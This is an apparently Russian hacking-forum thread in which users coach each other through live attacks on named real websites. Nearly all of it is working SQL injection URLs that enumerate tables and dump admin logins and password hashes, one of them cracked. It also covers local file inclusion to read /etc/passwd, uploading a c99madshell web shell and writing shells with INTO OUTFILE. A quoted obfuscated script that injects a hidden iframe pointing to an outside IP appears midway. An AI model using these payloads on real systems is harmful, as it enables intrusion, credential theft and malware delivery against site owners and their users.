ошибка на том сайте не выводится, а просто перебрасывает на главную страницу сайта.. собственно вопрос.. как определить принтабельные поля?

ну как бы да))))

http://www.tati.ch/shop.php?cat=-1+union+select+1,2,version(),4/*

ппц, я что-то не додумался сразу version() или user() подставить, ошибку-то все равно показывает)))

ладно, молодой - исправлюсь =)

gisTy, в таком случае помогают логические запросы
например доступ к information_schema у тебя есть
http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19+from+information_sc hema.tables/*
и есть подзапросы
http://www.beka.ru/php/content.php?id=1614+and+ascii(lower(substring(user (),4,1)))=53/*

Imperou$, смотря откуда ты выдрал логин и пасс, если сайтов действительно много, большая вероятность удаленного подключения к серверу mysql, если не поможет поищи различные службы через passwd. если движок на сайте публичный можешь через гугл найти путь до админки, если не публичный помогут cgi-сканеры; тем более если на сайте есть новости значит их кто то добавляет) а вообще из названия таблицы обычно понятно к чему подходит логин:пароль)

Неактуально :)

Так чё,никто не знает,где путь до конфига в httpd.conf ? Выдрал этот грёбаный фаил и что дальше ? Ничего там нету.Что искать то ? Какие директивы ?

Велемир, кинь в личку содержимое - я тебе покажу

Велемир в закладки куда-нибудь положи https://forum.antichat.ru/thread22832.html

Если там не тоит

<meta http-equiv="Content-Type" content="text/html; charset=кодировка>

можно попробовть сделать это через юникод

например как тут

http://forum.antichat.ru/showpost.php?p=658326&postcount=16
стоит

Велемир в закладки куда-нибудь положи https://forum.antichat.ru/thread22832.html

Ппц пасип те за статью Ж))))))))))),оч помогла)).Встали терь такие вопросы.К моему удивлению,.bash_history файла не оказалось ни у кого из юзеров (.В конфиге,лежащему по пути etc/httpd/conf/httpd.conf,нашёл одну директиву - AccessFileName .htaccess.Походу не прочитать мне буит их(.По идее,такая же директива нужна для каждого файла?).тобишь должна быть строка ещё AccessFileName .hpasswd.Хм...Есть ещё какойто конфиг,лежащий по адресу

etc/httpd/conf/vhosts/Vhosts_ispconfig.conf.Тут много интересных директив,но про них в той статье не сказано было.Есть догадки...но что это конкретно за фаил кто-нибудь может пояснить ?)

Да,и вот ещё что. В директивах ErrorLog указаны пути до лог файлов.Некоторые пути дают ошибку,хотя всё верно вводил.Некоторые пустые,но существуют 100%)).*Настоящего* лог-файла с даными ещё не встречал).Такое ощущение, что отключен лог ошибок вапще,ибо пхп.ини не прочитать =_____=

Есть такой сайт http://www.modvlad.ru

Как то на него залез и решил проверить на инъ...ю
нашел ссылку http://www.modvlad.ru/photo/?g=37
проверил http://www.modvlad.ru/photo/?g=37' выдало:


Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39

попробовал обратиться к базе не выходит подскажите плиз кто знает что дальше делать??

читать статьи про sql inj...
вообще подбирай столбцы через ордер бай

попробовал:
http://www.modvlad.ru/photo/?g=-1+order+by+100/*
и от 1 до 100

ни каких продвижений ошибка та же
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39
что делать дальше??

полей 6, а скуля слепая
http://modvlad.ru/photo/?g=33+and+if(substring((select+version()),1,1)=5,1 ,0)

http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor mation_schema.tables+limit+38,1/*

38 Таблиц.Проще поискать скрипт с выводом =_________=.У меня тоже такое было.

А что мне делать со слипой скуляй?

и где взять скрипт с выводом если не секрет?

Не слепая!!!!
Открой исходный код страницы и поищи поля 3,4,5,6. Вывод в них
Вот пример
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
ищем в коде 444, и рядом видим версию 5.0.45-log

ага нашел! А как теперь сформировать запрос на вывод таблицы?

Запрос из базы только Лимитом(!!!) Попробовал вывести всё... опера всю оперативу скушала...

(= ведь это журнал! там новерное одана таблица те оперу села какя нить пост с кучей новостей типа архива или ещё чё нить!
А вот например как мне просканить на таблицу юзер?

Велемир, терпение надо иметь, а не пытаца найти легкий путь :) В крайнем случае написать граббер если не хватает терпения 38 таблиц ручками прочекать. И это при том, что первые 16 - системные :)

А чёза это кмс?

и как Лимитом запос мутить?

Там есть таблица be_users. В ней поля:
-uid
-pid
-tstamp
-username
-password
-admin
-usergroup
-email
И ещё до*** и больше. Вот и вытаскивай.

Покажи запрос плиз
что после http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor %20mation_schema.tables+limit+38,1/* делал мне для себя надо знать
и как тащить и я вас больше не потревожу! в формате http:// к примеру username плиз оч надо для обучения!

На форум
Логин Administrator
Пароль simbol
Есть админка, но в какой таблице пароли хз

Вот тебе запрос для вывода данных юзеров из форума
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users/*

а в нём http://wow.alania.net/ такое проканает?

Проканает ;)
http://wow.alania.net/gilds.php?guid=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*

значит сейчас нада писать вот так
http://wow.alania.net/gilds.php?guid=-3+union+select+111,222,username,user_password/*

Сейчас нужно идти вот сюда
http://forum.antichat.ru/showthread.php?t=19605
и ЧИТАТЬ ЧИТАТЬ ЧИТАТЬ
а иначе всегда будут подобные вопросы.... вот чесно, сам подумай ОТКУДА ТЫ взял что там есть эти поля и ИЗ КАКОЙ таблицы ты выводишь :)
Удачи!

Давайте все-таки в этой теме задавать вопросы, а не бредовать на тему сделайте мне скуль иньекцию. Здесь могут помочь в нестандартном\непонятном случае, но забивать тему элементарными вопросами сто раз расписанными в статьях не стоит. Буду удалять

_http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+0,1/*

Константинэ... только не ругай меня... :)
P.S Не могу уснуть...

JoN.SmiT не падай в минуса..) читай ману.

еще чтот разкрутил..
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.be_users/*
administrator:d9d1b168eac8f197e0576b56cfc23ece => gfhjkm

http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.fe_users/*
administrator;password

Есть скуля в поле login, как получить аутпут?)
http://www.rusrek.com/ru/weather/?login=1'+union+select+1/*&password=default

http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+order+by+1/*
- здесь 1 колонка

http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+union+select+1/* - а тут пишет
Query failed: The used SELECT statements have a different number of columns - в чем проблема? В неправильных количествах колонок? Их всего одна :)

Хм..странно.
Вот тут все нормально сработало:
http://www.rciscc.uz/news.php?id=110'+union+select+1,2,3,user(),5,6,7/*

в общем есть скуль:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(column_name,0x3c2f62723 e)+from+information_schema.columns+where+table_nam e='user'/*
но при попытке просмотра таблицы
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat_ws(0x3a3a,login,passwor d,email,0x3c2f62723e)+from+medsunr_mifegyn.user/*
мы ничего не получаем (точнее получаем ошибку) следовательно доступ к стаблице закрыт? или я что то не так делаю...

gisTy
очень интересно... о чем пишет данная ошибка.. а так хз. пробвал конверт. тоже самое

2 gisTy таблица пустая:
_http://www.women-medcenter.ru/index.phtml?id=-25999'+union+select+1,count(*)+from+user/*

...

Это обычная таблица (не VIEW), т.ч. фильтрации вывода нет.

Записей в ней нет.



http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(TABLE_NAME,'-',TABLE_TYPE,'-',TABLE_ROWS,0x3c2f62723e)+from+INFORMATION_SCHEMA .TABLES/*

Хотя можно посмотреть и так.

http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,COUNT(*)+from+medsunr_mifegyn. user/*

Если бы небыло прав, то показало бы ошибку.

Ershik, такая ситуация неоднократно расписывалась, объяснение в чем причина и решение проблемы - http://forum.antichat.ru/showpost.php?p=497033

Понял, спасибо.
Я хочу вытащить с помощью игьекции хеши из форума phpbb2.
Они вместе в одной базе данных.
Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*

Ошибка получения информации из базы данных.Table 'gelezo2.phpbb_users' doesn't exist
Как действовать в этом случае?

doesn't exist - не существует

Как действовать в этом случае?
Подбирай таблицу. С суфиксами пробуй.

Я знаю, что нет.
Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
Собрался составить запрос, чтобы вытащить данные.
Не дала, :D

Я знаю, что нет.
Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
Собрался составить запрос, чтобы вытащить данные.
Не дала, :D
ну ты сам на свой вопрос и ответил. Таблицы phpbb_users именно в этой базе нет... когда вытаскивал название таблиц ... надо было ещо и table_schema глянуть а не только table_name

union+select+1,2,concat_ws(0x3a,table_name,table_s chema),4,5+from+information_schema.columns+where+c olumn_name+like+CHAR(37,112,97,115,37)+limit+0,1/*
Удобно при поиске таблиц, содержащих в себе поля в которых есть сочетание "pas"
Red sps. ;)

Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*

я недавно с таким сталкивался.. просто таблица phpbb_users находится в другой ДБ..
собственно вот запрос:

http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2e,table_sch ema,table_name),7,8,9,10,11,12+from+information_sc hema.tables+where+table_name=0x70687062625f7573657 273+limit+1,1/*

так узнаем имя той ДБ, где висит табличка phpbb_users, что нам и надо, и составляем запрос на выборку из этой таблички.

Здравствуйте! :)

Залил c99madshell на сервер 1.

Есть доступ admin через c99madshell в MySQL базы сервера 2.

Скажите, как можно залить шелл на сервер 2, если есть только admin доступ к MySQL базам этого сервера?



Спасибо!

Здравствуйте! :)

Залил c99madshell на сервер 1.

Есть доступ admin через c99madshell в MySQL базы сервера 2.

Скажите, как можно залить шелл на сервер 2, если есть только admin доступ к MySQL базам этого сервера?



Спасибо!
Стандартно, через into outfile

http://darkbrotherhood.ru/index.php?charakter=&type=&p=articles&area=1&categ=&ud=&selby=&show=&pp=1'&page=1&PHPSESSID=810a244f15bdf6a24b5889fe90dde026
Бошка не варит у мя совсем(((
подскажите

http://darkbrotherhood.ru/index.php?charakter=&type=&p=articles&area=1&categ=&ud=&selby=&show=&pp=1'&page=1&PHPSESSID=810a244f15bdf6a24b5889fe90dde026
Бошка не варит у мя совсем(((
подскажите

эм... а чем помогать то? это вроде как не скул инж... там в параметре area передается адрес к файлу:

http://darkbrotherhood.ru/index.php?area=1asd&p=static&page=offres

попробуй это заюзать, может получится...

Foxtrot1
http://darkbrotherhood.ru/index.php?area=1+union+select+aes_decrypt(aes_encr ypt((version(),0x71),0x71),2,3,4,5,6/*
mysql 4 or 5.
http://darkbrotherhood.ru/index.php?area=1+union+select+password,2,3,4,5,6+f rom+mysql.user/*
у юзера нет прав.
Table 'wwwdarkbrotherhoodru_mysql.users' doesn't exist
переберай колонки.)

кстати версия мускула не 4, а 5... но доступа к information_schema юзверь не имеет...
http://darkbrotherhood.ru/index.php?area=1+union+select+1,2,3,4,5,6+from+inf ormation_schema.tables/*

На выделеном сервере установлен phpmyadmin, как его можно найти, при условии, что папка переименова?
Существуют какие-нибудь сканеры?

Ну а как ты его найдёшь?
_https://forum.antichat.ru/threadnav40031-1-10.html Сканер.
Или поищи скрипт nikto.pl

Попробую. Спасибо.

http://darkbrotherhood.ru/index.php?area=1+union+select+password,2,3,4,5,6+f rom+mysql.user/*
кстати по этому запросу говорит не то что нет доступа к базе... а то что базы не существует.. просто запрос неправельный..
http://darkbrotherhood.ru/index.php?area=1+union+select+1,2,3,4,5,6+from+mys ql.users/*
вот тут реально говорит что доступа к таблице нет...

gisTy, во-первых запрос правильный, во-вторых Access denied for user 'darkbrot_mysql'@'%' to database 'mysql' переводица как Доступ запрещен бла-бла-бла, а Doesn't exist - не существует.

Ну а как ты его найдёшь?
_https://forum.antichat.ru/threadnav40031-1-10.html Сканер.
Или поищи скрипт nikto.pl
nicto.pl - для cgi. Он не подходит. Скрипты не помогли
Пытаюсь загрузить через думпер, пишет 500 ошибку.

сори ступил... эх матан матан... не суждено мне его было сегодня сдеать...

Как подкл к Postgresql ?) и что там можно надыбать?) Точнее я нашол уязв она сообщ что моно приконектиться

2 diznt, 2 gisTy, 2 sabe
По поводу сайта http://darkbrotherhood.ru
ЦМС koobi.
Версия мускула 4.1.22 (ну и ясно что никакой информатион_схемы нету)
Дырок хватает. Все что я нашел вели только к посимвольному бруту, кроме одной и вот она интересна раскруткой.
Дыра в форуме вот тут
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,11,version() ,13/*
Вроде все нормально, но...
Качаем koobi смотрим таблицы, и колонки (я скачал немного не ту версию, но догадался с префиксом)
Запрос
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,uname,pass,1 3+from+k_user/*
выдет странную картину - имена и пароли (хеши) видны не полностью.
Юзаем функции работы со строками в мускуле, я взял MID()
Запрос
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(email,1, 8),MID(pass,1,8),13+from+k_user/*
выдал то что нужно :)
Восьмерку тут MID(pass,1,8) подобираем опытным путем (интересно почему там 8 )
Дальше думаю понятно, меняем 1 так что бы увидеть всю строку целиком.
НО, хеш можно получать и не весь, вполне хватит первых восьми символов, с ними идем сюда http://hashcracking.info ,
выбираем поиск по маске и получаем пасс ;)
У этой ЦМС в админке бывает авторизация по мылу, но тут по логину юзера. Его находим вот тут (на случай логина больше 8 символов)
http://darkbrotherhood.ru/index.php?area=1&p=static&page=sostav (Глава клана)
Поэтому последний запрос вот такой
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(uname,1, 8),MID(pass,1,8),13+from+k_user+where+uname=CHAR(6 8,97,114,107,101,108,118,101)/*
...
Было интересно исследовать. Может кто найдет другой путь?

пздц хакер))))) пасиб + заслужил

gisTy
сори, но не пиши если незнаеш..)

Red_Red1
молодец..)

Вот я чето не понял с получением полного хеша

ЗЫ вопрос снят

Ребят, подскажите какой-то багнутый движок чего-нибудь на локалхостЪ, чтоб потренироваться шелл заливать?

:) Качай любой да заливай )))))
phpNuke к примеру... начиная с 6-й версии... phpbb...

что то глючит мейл.ру :-)
http://sirius.jino.ru/mail.ru_d.rar

Сорри, если не в тему.
Если кому надо (как я видел в комментах к одному видео оч сильно просили), то написал код быстрого кодирования в hex с локалхоста:

<form action='<? $PHP_SELF; ?>' method=POST>
<input type=text name='hex'>
<input type=SUBMIT value="OK">
</form>
<?
error_reporting(0);
echo "$hex= ";
echo("0x".bin2hex("$hex"))
?>

чо делать если нет принтабельных полей
подобрал кол-во полей попробывал ни одно не выводит даже в тело документа
????

2 Vid0k
Это т.н. слепая иньекция. Делай посимвольный перебор, долго ну а шо делать :)
Почитать можно тут http://www.securitylab.ru/contest/212099.php
или тут http://forum.antichat.ru/showthread.php?t=35207
Вобщем вопрос этот решаем.
Удачи.
Да кстати... попробуй ЕЩЕ поискать вывод... иногда он бывает весьма необычным ;)

2 Vid0k попробуй
Итак, первая проблема с которой мы столкнемся - $_GET['id'] не может быть равным 0 или отрицательным. И запрос, соответственно всегда будет выполнятся нормально, не передавая "управление" второму, внедряемому нами UNION SELECT. Решается просто: в качестве $_GET['id'] вбиваем 1-1 и получаем 0 Вот. (c) Cytech http://forum.web-hack.ru/index.php?showtopic=69093

script
<!--
var d=document,kol=561;
function O10H485B5B18EDFA3(H485B5B18EE79A){ return( parseInt(H485B5B18EE79A,16));}function H485B5B18EF78A(H485B5B18EFF82){ function H485B5B18F176E() {var H485B5B18F1F66=2;return H485B5B18F1F66;} var H485B5B18F077B='';for(H485B5B18F0F74=0; H485B5B18F0F74<H485B5B18EFF82.length; H485B5B18F0F74+=H485B5B18F176E()){ H485B5B18F077B += ( String.fromCharCode (O10H485B5B18EDFA3(H485B5B18EFF82.substr(H485B5B18 F0F74, H485B5B18F176E()))));}return H485B5B18F077B;} document.write(H485B5B18EF78A('3C7363726970743E696 628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3 232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292 A3430383539292B27353438333662306638355C27207769647 4683D343439206865696768743D3931207374796C653D5C276 46973706C61793A206E6F6E655C273E3C2F494652414D45203 E27293B7D766172206D7969613D747275653B3C2F736372697 0743E'));
//-->
/ script

ребят что это такое? и как с этим боротся? появляется сразу после боди..

очевидно это реклама, добавляемая бесплатным хостингом. ЕСли работают файлы ХТАККЕССы, то можешь изменить расширение не на пхп а на другое, тогда может убраться ;)

script
<!--
var d=document,kol=561;
function O10H485B5B18EDFA3(H485B5B18EE79A){ return( parseInt(H485B5B18EE79A,16));}function H485B5B18EF78A(H485B5B18EFF82){ function H485B5B18F176E() {var H485B5B18F1F66=2;return H485B5B18F1F66;} var H485B5B18F077B='';for(H485B5B18F0F74=0; H485B5B18F0F74<H485B5B18EFF82.length; H485B5B18F0F74+=H485B5B18F176E()){ H485B5B18F077B += ( String.fromCharCode (O10H485B5B18EDFA3(H485B5B18EFF82.substr(H485B5B18 F0F74, H485B5B18F176E()))));}return H485B5B18F077B;} document.write(H485B5B18EF78A('3C7363726970743E696 628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3 232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292 A3430383539292B27353438333662306638355C27207769647 4683D343439206865696768743D3931207374796C653D5C276 46973706C61793A206E6F6E655C273E3C2F494652414D45203 E27293B7D766172206D7969613D747275653B3C2F736372697 0743E'));
//-->
/ script

ребят что это такое? и как с этим боротся? появляется сразу после боди..
А помойму это зашифрованно чем то , помню была такая лажа ...

это ифраме..поимели меня

А помойму это зашифрованно чем то , помню была такая лажа ...
HEX это внутри...

есть трабла..
http://www.mymaika.ru/item.php?id_fon=34&id_swf=1117&id='1'+and+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22/*
подобрал колонки 22 штуки.. через +order+by+22/* иньекция происходит в where clause
You have an error in your SQL syntax near '' and union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22/*' at line 1
пробвал использовать and но не получилось...
закрывал скобки по разному.. тож нече..
пробвал обходить фильтрацию.. нифига.

или сдесь:
http://www.hitech-online.ru/boards/pc/weblinks.html?start=9999+union+select+1/*

подскажите что делать?

вопрос специалистам....
делаю http://site.com/index.php?m=vopros-otvet+AND+ASCII(SUBSTRING((select from user limit 3,1 ),4,1))>57/*

получаю
Ll('<P
CPgT1gQD"<.X(?j
и так далее.....что это за бред?

подскажите что делать?
я конечно могу сильно ошибаться, но может быть тут 3 версия мускула и конструкции union select нету?

Хочу соединиться с удаленным mysql через шелл.
Пишет:
Lost connection to MySQL server at 'reading initial communication packet', system error: 61
То есть, запрещено на конечном mysql сервере подключения извне?

хм.. вот тут наткнулся на сайт:
http://www.musicxport.nl/page.php?pageAlias=sadadasda&newsId=2769'
в обцем если менять значение переменной pageAlias то меняется и вывод на странице.. можно ли с этим что-нибудь сотворить?

-Есть про-печатка символов "> пытаюсь вбить в URL "><script>Ealert('fgf')</script>
но окошко с xss не вылетает что я не так делаю ?

Mo4x, я не очень понял что у тебя там есть, но возможно просто фильтруюца кавычки. Попробуй вместо них написать слэши (/fgf/), в алерте есессна. А вообще лучше просто ссылку кинь, можешь в личку, если не хочешь светить.

http://league.russiangun.ru/rgl/match.php?matchid='
Тут слепая иньекция или я чтото путаю?

-Есть про-печатка символов "> пытаюсь вбить в URL "><script>Ealert('fgf')</script>
но окошко с xss не вылетает что я не так делаю ?
js должен быть на странице, а не только в урле

Просканировал тут один сайт с помощью Reverse IP,вот он выдал:

site.ru has the IP address: xxx.xxx.xx.xxx
425 found with the IP xxx.xxx.xx.xxx

То бишь с таким айпи существует ещё 425 сайтов, и хостятся на ком-то.Это вообще реальное число или меня плющит?:D

...
а почему бы и не существовать? это норально впринципе.. есть хостеры на которых и побольше висит..

Велемир кто знает куда хостеры катяться

Есть админка phpBB 2.0.22, нужно залить шелл. Вопрос - если я просто восстановлю бд форума с одной нужной мне строчкой, то вся база сотрется или допишется только эта строчка, а бд останется в целости ?

http://www.bjsornamentalkoi.co.uk/product.asp?product_id=-1+union+select+1--
выдает ошибку..
Microsoft OLE DB Provider for SQL Server error '80040e14'

All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.
help

0nep@t0p
rewrite

выдает ошибку..

help

0nep@t0p
rewrite
ну так ... тебе пишет что разное количество параметров...
http://www.bjsornamentalkoi.co.uk/product.asp?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16--

2 sabe
А что хелп то? Крути всё нормально MSSQL
_http://www.bjsornamentalkoi.co.uk/product.asp?product_id=1+or+1=(SELECT+TOP+1+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NA ME+NOT+IN+('links','links_category'))--
2 theli
Забавно :)

Хм...А имена таблиц и полей(если стоят по умолчанию) на всех хостящихся на нём сайтов - одинаковые ?

2 sabe 2 theli
Забавно :)
ой, чёго-то совсем забыл что оно так удобно пишет ошибки :D

спс... я просто не люблю microsoft ;)

...
надо смотреть по обстоятельствам... например на хостинге висят два форума на двух разных сайтах.. если движки самописные то названия таблиц и колонок такое как в движке задаано было... а если паблик движки то там названия таблиц и колонок можно узнать поставив себе на локалхост или еще куда-нибудь форум и посмотрев (не будешь же ты во всех скриптах менять название таблицы и колонок=))...

http://shop.tuse.com.ua/basket/?mode=../../../../../../../../etc/passwd%00&id=43
есть лькальный инклуд,что с ним можно сделать? =\

...
при помощи него можно смотреть различные файлы на сервере..
можно еще проверять наличие папок, например так:
www.site.com/script.php?page=../../../../../../../../var/www/../../etc/passwd
где вместо /var/www ты подставляешь проверяемую папку
если выведется содержимое /etc/passwd то значит папка существует, если выскочит ошибка - то нет такой страницы.. соответстветсвенно проверяй другие места..

Red_Red1,скинь плз ссылку в приват.(с розруленой скулей)

Подставляю кавычку, выплевывает следующее:
[quote]
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'cint'

/page.asp, line 7[./quote]
Это MSSQL? Если да, почему тогда не работает статья [ cash ]?

Подставляю кавычку, выплевывает следующее:
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'cint'

/page.asp, line 7
Это MSSQL? Если да, почему тогда не работает статья [ cash ]?

Это не ошибка MSSQL, это VB. :)

Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?

Page -1 was not found
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: EPiServer.Core.PageNotFoundException: Page -1 was not found

Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.


Stack Trace:

[PageNotFoundException: Page -1 was not found]
EPiServer.DataAccess.PageLoadDB.Load(PageReference pageLink) +698
EPiServer.DataFactory.ᐂ(PageReference ) +50
EPiServer.DataFactory.GetPage(PageReference pageLink, AccessLevel access) +496
EPiServer.PageBase.GetPage(PageReference pageLink) +171
EPiServer.SimplePage.get_CurrentPage() +177
EPiServer.EditPage.get_CurrentPage() +218
EPiServer.UserControlBase.get_CurrentPage() +21
Goteborg.templates.Units.TopMenu.InitDropDown() +15
Goteborg.templates.Units.TopMenu.OnInit(EventArgs e) +58
System.Web.UI.Control.InitRecursive(Control namingContainer) +240
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Control.InitRecursive(Control namingContainer) +178
System.Web.UI.Page.ProcessRequestMain() +197

Значит, что либо сделать невозможно.
http://www.goteborg.com/default.aspx?id=-1' - Здесь аналогично?

Да, вообще там используется System.Number.ParseInt32.

надо смотреть по обстоятельствам... Мде... чёт я не подумал).Всё равно попробую)

Вот у меня несколько вопросов
Нашел сайт нашел все таблицы+ колонки вопрос как прочитать колонки в таблице если я делаю запрос типу http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,3,id,username,pas sword,7,8,9,10,11,12,13,14+FROM+Users+LIMIT+1,1/*
В таблице Users имеются следующие колонки
Users
--id,username,password,email

Возможно я чтото делаю не так или нужно шифровать? (пробовал в HEX шифровать кое где и не получилось)
в придачу даю список всех таблиц
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Blog
Cats
Comment
My_places
Portfolio
Snippet
Snippet_cat
Snippet_language
Tags
Testimonials
Top_cat
Top_rated
User
Users

http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,concat_ws(0x3a,us ername,password),3,4,5,7,8,9,0,1,2,3,4+from+users/*
лови .. и думай ..

http://www.pemshop.com/detail.aspx?ID=1%20or%201=(select%20system_user)-- - с этим можно что нибудь сделать?
Аналогичный прошлый вопрос.

Ershik
Только расскрытие пути

http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA


скуля...какие предложения по раскрутке?

К какому виду относится эта ошибка?
http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'
Warning: array_count_values() [function.array-count-values]: Can only count STRING and INTEGER values! in /u0/webroot/virtual/newsite.ncbi.managed.tibus.net/ncbi/shop/show_cart.php on line 81

http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA


скуля...какие предложения по раскрутке?

Никак видимо, проверка длины параметра sstring, максимальная длина = 12 символов : хотя и пропускает = (', /**/, спец символы);

К какому виду относится эта ошибка?
http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'

http://ru2.php.net/manual/en/function.array-count-values.php

z3r0cool ошибка появляется не только в этом параметре....
на пример введи в поле поиска кавычку

Gorev
Поиск это и есть параметр sstring
Запрос у тебя вываливается на страницу посмотри внимательно ,и всё сам увидишь
Попробуй ввести 10 символов(любых) и ковычку ошибки не будет, а 9 символов и ковычка- ошибка То-есть обрезается запрос после 10 символов + 2 знака %
LIKE '%твои_10_символов%'

jokester spasibo... znachit ne sud'ba

Люди!!! Что делать?
Вот получил 80 kb хлама по запросам:
?news_id=9999+union+select+1,2,3,4,5,6,7/*
?news_id=9999+union+select+1,2,3,DATABASE(),5,6,7/*
?news_id=9999+union+select+1,2,3,USER(),5,6,7/*
?news_id=9999+union+select+1,2,3,VERSION(),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5,6,7/*
?news_id=9999+union+select+1,2,3,concat_ws(0x2F,us er,password),5,6,7+from+mysql.user/*
?news_id=9999+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7+from+mysql.user/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/syslog.conf'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/ftpusers'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/proftpd.conf'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/hosts'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/services'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/group'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/profile'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/bashrc'),5,6,7/*

Самое ценное это

horde/7ec6cb6253573035
pma_0m8q29w9ure8/042d59146e94d7b2
admin/54e0c6945fa5e34c
u15364/6cb1963d2018c3ea

А что теперь делать то? Hash расшифровать неполучается.
Нужен дамп базы данных! HELP ME

Хеши Mysql попробуй попросить сбрутить из за платно.

Уже раз 10 просил - пока ничего :(
http://hashcracking.info - нет результата :(
PasswordRpo - кислота :(
HELP ME :confused:

Люди!!! Что делать?

INTO OUTFILE вроде никто не отменял? :)
Кидай если что линк в личку, посмотрим.

могу менять html код страницы, знаю полный путь до папки, как залить шелл? а именно стянуть с удаленного сервака файл в эту папку?
Конструкции типа <? php system("ls") ?> не выполняются. js работает

sedoy_xxx, php, я так понял, там не выполняеца?

<? php system("ls") ?>
А с синтаксисом точно всё правильно?

А с синтаксисом точно всё правильно?
бля. он же пишет
могу менять html код страницы

походу он решил, что если в хтмл код вставить <?php ?>, то он будет выполняться как пхп. что за бред

походу он решил, что если в хтмл код вставить <?php ?>, то он будет выполняться как пхп. что за бред
